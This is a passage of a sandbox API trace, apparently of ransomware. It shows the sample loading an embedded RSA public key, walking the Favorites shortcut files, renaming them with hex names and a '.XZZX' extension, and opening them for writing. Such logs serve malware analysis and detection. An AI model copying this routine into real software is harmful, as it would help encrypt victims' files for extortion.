[4]=0x2a, [5]=0x8, [6]=0xe4, [7]=0x8a))) returned 0x0 [0203.930] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0203.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0203.930] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\0C5F7474219CA092C35F5AF6246784DA.XZZX") returned 87 [0203.930] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="XZZX") returned 0x0 [0203.930] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url", dwFileAttributes=0x20) returned 0 [0203.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 799 os_tid = 0xf18 [0204.090] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.090] lstrcpyW (in: lpString1=0x2caf460, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0204.090] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0204.090] SetErrorMode (uMode=0x1) returned 0x1 [0204.090] lstrcpyW (in: lpString1=0x2caf860, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0204.090] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xb621d716, Data2=0x1e1c, Data3=0x4ccf, Data4=([0]=0xb7, [1]=0x7c, [2]=0x64, [3]=0x7f, [4]=0xa4, [5]=0x1c, [6]=0x7e, [7]=0x6d))) returned 0x0 [0204.090] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0204.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0204.090] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\E2E81A680908A8A4B621D7160BD38CEC.XZZX") returned 87 [0204.090] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="XZZX") returned 0x0 [0204.090] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url", dwFileAttributes=0x20) returned 0 [0204.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 800 os_tid = 0xf1c [0204.242] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.242] lstrcpyW (in: lpString1=0x2caf460, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0204.242] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0204.242] SetErrorMode (uMode=0x1) returned 0x1 [0204.242] lstrcpyW (in: lpString1=0x2caf860, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0204.242] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xe7cacca2, Data2=0x79ce, Data3=0x49e0, Data4=([0]=0xab, [1]=0x70, [2]=0x63, [3]=0x11, [4]=0x6b, [5]=0x13, [6]=0xd, [7]=0x58))) returned 0x0 [0204.242] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0204.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0204.242] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\5FE93C5C23265240E7CACCA225F13688.XZZX") returned 87 [0204.242] StrStrW (lpFirst="Microsoft Store.url", lpSrch="XZZX") returned 0x0 [0204.242] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url", dwFileAttributes=0x20) returned 0 [0204.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 801 os_tid = 0xf20 [0204.404] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.404] lstrcpyW (in: lpString1=0x2caf460, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0204.404] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0204.404] SetErrorMode (uMode=0x1) returned 0x1 [0204.404] lstrcpyW (in: lpString1=0x2caf860, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0204.404] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xe5a88d53, Data2=0x3c48, Data3=0x4b96, Data4=([0]=0x93, [1]=0x59, [2]=0xe5, [3]=0x5f, [4]=0x85, [5]=0xc7, [6]=0xe3, [7]=0x46))) returned 0x0 [0204.404] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0204.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0204.404] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\1887335811CC6A30E5A88D5314974E78.XZZX") returned 81 [0204.404] StrStrW (lpFirst="MSN Autos.url", lpSrch="XZZX") returned 0x0 [0204.404] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url", dwFileAttributes=0x20) returned 0 [0204.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 802 os_tid = 0xf24 [0204.554] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.554] lstrcpyW (in: lpString1=0x2caf460, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0204.554] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0204.554] SetErrorMode (uMode=0x1) returned 0x1 [0204.554] lstrcpyW (in: lpString1=0x2caf860, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0204.554] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xcf706c6d, Data2=0xfed2, Data3=0x4d92, Data4=([0]=0xb9, [1]=0x12, [2]=0xaa, [3]=0x3c, [4]=0x76, [5]=0x26, [6]=0x62, [7]=0xdb))) returned 0x0 [0204.554] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0204.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0204.554] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\B5CD176A4D367DC4CF706C6D5001620C.XZZX") returned 81 [0204.554] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="XZZX") returned 0x0 [0204.554] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url", dwFileAttributes=0x20) returned 0 [0204.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 803 os_tid = 0xf28 [0204.711] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.711] lstrcpyW (in: lpString1=0x2caf460, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0204.711] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0204.711] SetErrorMode (uMode=0x1) returned 0x1 [0204.711] lstrcpyW (in: lpString1=0x2caf860, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0204.711] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xd1965c4, Data2=0xf885, Data3=0x468c, Data4=([0]=0x89, [1]=0x96, [2]=0xd2, [3]=0x75, [4]=0xd6, [5]=0x72, [6]=0x2b, [7]=0x82))) returned 0x0 [0204.711] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0204.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0204.711] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\68C7BED4447C46BC0D1965C447472B04.XZZX") returned 81 [0204.711] StrStrW (lpFirst="MSN Money.url", lpSrch="XZZX") returned 0x0 [0204.712] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url", dwFileAttributes=0x20) returned 0 [0204.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 804 os_tid = 0xf2c [0204.866] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.866] lstrcpyW (in: lpString1=0x2caf460, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0204.866] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0204.866] SetErrorMode (uMode=0x1) returned 0x1 [0204.866] lstrcpyW (in: lpString1=0x2caf860, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0204.866] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x8a3cc50f, Data2=0xd8e9, Data3=0x4920, Data4=([0]=0xbb, [1]=0x6e, [2]=0x2c, [3]=0xb1, [4]=0xc7, [5]=0x27, [6]=0x64, [7]=0x0))) returned 0x0 [0204.866] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0204.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0204.866] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\179402A73DF58E208A3CC50F40C07268.XZZX") returned 81 [0204.866] StrStrW (lpFirst="MSN Sports.url", lpSrch="XZZX") returned 0x0 [0204.866] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url", dwFileAttributes=0x20) returned 0 [0204.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 805 os_tid = 0xf30 [0205.022] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.022] lstrcpyW (in: lpString1=0x2caf460, lpString2="MSN.url" | out: lpString1="MSN.url") returned="MSN.url" [0205.022] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0205.022] SetErrorMode (uMode=0x1) returned 0x1 [0205.022] lstrcpyW (in: lpString1=0x2caf860, lpString2="MSN.url" | out: lpString1="MSN.url") returned="MSN.url" [0205.022] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x9fdf0e5b, Data2=0x3f8a, Data3=0x423c, Data4=([0]=0x9f, [1]=0x64, [2]=0xbe, [3]=0x11, [4]=0x4a, [5]=0xc9, [6]=0x5c, [7]=0x95))) returned 0x0 [0205.022] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0205.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0205.022] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\12C6220E107078589FDF0E5B133B5CA0.XZZX") returned 81 [0205.022] StrStrW (lpFirst="MSN.url", lpSrch="XZZX") returned 0x0 [0205.022] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url", dwFileAttributes=0x20) returned 0 [0205.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 806 os_tid = 0xf34 [0205.178] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.178] lstrcpyW (in: lpString1=0x2caf460, lpString2="MSNBC News.url" | out: lpString1="MSNBC News.url") returned="MSNBC News.url" [0205.178] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0205.178] SetErrorMode 